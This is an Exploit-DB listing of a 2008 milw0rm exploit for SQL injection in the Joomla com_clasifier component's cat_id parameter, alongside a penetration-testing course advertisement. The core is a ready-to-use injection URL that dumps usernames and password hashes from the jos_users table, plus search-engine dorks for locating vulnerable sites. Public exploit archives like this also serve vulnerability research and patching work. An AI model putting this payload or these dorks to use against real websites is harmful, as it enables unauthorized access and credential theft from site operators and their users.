Joomla! Component com_clasifier - 'cat_id' SQL Injection

EDB-ID:

5146


Author:

S@BUN

Type:

webapps


Platform:

PHP

Date:

2008-02-18


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

###############################################################
#
# joomla SQL Injection(com_clasifier)
#
###############################################################
#
# AUTHOR : S@BUN
#
 HOME 1 : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: com_clasifier
#
# DORK 2 : allinurl: com_clasifier cat_id
#
################################################################
EXPLOIT :

index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*


################################################################
# S@BUN             i AM NOT HACKER             S@BUN
################################################################

# milw0rm.com [2008-02-18]